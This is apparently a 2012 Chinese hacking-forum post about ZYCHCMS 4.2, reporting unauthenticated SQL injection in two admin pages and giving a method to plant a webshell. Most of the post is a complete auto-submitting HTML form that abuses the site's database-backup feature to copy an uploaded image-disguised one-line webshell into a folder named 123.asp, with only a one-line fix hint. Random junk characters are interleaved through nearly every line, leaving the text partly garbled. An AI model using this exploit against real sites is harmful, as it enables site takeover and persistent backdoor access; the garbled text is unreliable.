A: i5 b8 o; L! e7 B E8 v7 j) Z* J9 {- T$ p. W+ E. q: l
3 c, y" `+ Q f# b- _
* s$ g$ B( T H- |% U影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
. O W9 i; L( j ①SQL注射漏洞/ `7 j6 p4 K' d3 }
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
0 j) h% i" w4 G5 p1 }7 Y, a# L 漏洞原因:未过滤
2 b5 [1 t( R! {4 |! t" u6 c$ H. r 漏洞代码:
& u- C& U( L4 ]) l$ B 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
$ C5 Q4 l* [0 c% R5 o4 H 修复方法:在文件开头加入代码
6 L' d' V" z% C/ Q
: i5 R0 _: I: \' q3 B' C1 F0 z8 r" H+ }+ A
②后台拿WBSHELL
: C8 a$ i( w/ Z) G 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。& g, {. o; Y }, E* W7 E
这里在网上找了一个,改了下,将就着用。# u# f6 c% g a
以下是代码本地提交代码/ M _( ^! r- y- ?/ H. ?0 q
2 k% M; f! G- v, }9 h, S
5 f1 g$ Q) M$ `3 A/ z4 a<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
3 Z8 M& k4 l: s <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>0 x0 B e1 s* U
<tr>
) a/ o$ n+ o7 W. H7 D* [; _! M <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>% N8 @2 y2 a& A" y; q
</tr>
8 a, i3 M7 j$ T5 [ <tr>
/ n; \1 Q+ e1 g0 M8 V9 N9 r <td bgcolor=”#FFFFFF”><span class=”back_southidc”>; B' j1 I3 D4 H
</span>
& {6 {( v' d# _/ s; d+ A. V* L <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
; t' b) H7 a+ W; X# \5 X <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >1 L/ c, }" i5 d
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
3 o2 b- i/ ^, U <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d' r& H1 h' b: v9 {
<div align=”left”>+ l" s7 F. F% E- j1 G% T
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
# p. f# U( F6 V! W6 v) J2 G6 f <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>3 R1 b B- {" k6 a
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
& N& C. S' L a" W' I! O! Y8 A </div></td>
, a6 v4 M2 R( ?. p </tr>
) j: {8 x: T: Y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>- l7 v4 ]# ~, U) T) H `
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
7 q) V1 X- R# G! d: Q: F# N6 R <td class=”td”><div align=”left”>2 j( @# f, i6 `( Y* }
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />2 A# ^8 A; ~: Y/ J4 c% a9 |
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
5 J7 b& o- p# }& a! l </tr>$ y. L2 _: J; _0 T# w2 K
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>: l- p% p; {! \, s* _' r
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>1 m+ i* p% e0 s: L
<td class=”td”><div align=”left”>
+ C# o- w; a* Z* T8 b, ~3 a <input type=”submit” value=”确定备份” class=”btn”' z7 |7 f$ n# Y7 P) W) {$ O
</div></td>8 K9 M# m6 g0 {+ q; V# J% h8 J; Q
</tr>( y. {6 e( Z% h. F& {
</table></td></tr></form>6 D+ T! |* m' A; k# s/ _
</table>
9 n1 m, w, |$ x+ v$ J+ a </td>
4 z' H2 L3 O r </tr>' `: f7 K1 b0 j
</table> V4 b( F6 D* }
<script>
% d0 W3 R/ G+ i# q2 K0 z. L document.all.add.submit();: f* P, {8 W8 @. x O
</script>% W+ N- _/ q8 o% T$ \, h) Z- h
3 c' j+ N% |1 z4 H
9 ~; s7 g4 O [+ u6 o$ r& N; V& j" V5 t J0 o; G
7 [- E5 {; A5 e& W; A0 W8 Z7 d. N: {$ G1 [ a
5 o2 G+ Y% J6 \; K- F
8 N$ x4 g8 r# x, T5 R
/ e' Z. K) g0 V4 }# f
; M. K' O2 q- Z- D2 M$ j+ c# B9 U
5 x9 I7 H3 B) z& R6 d% e |
发表于 2012-9-10 21:09:51
收藏
支持
反对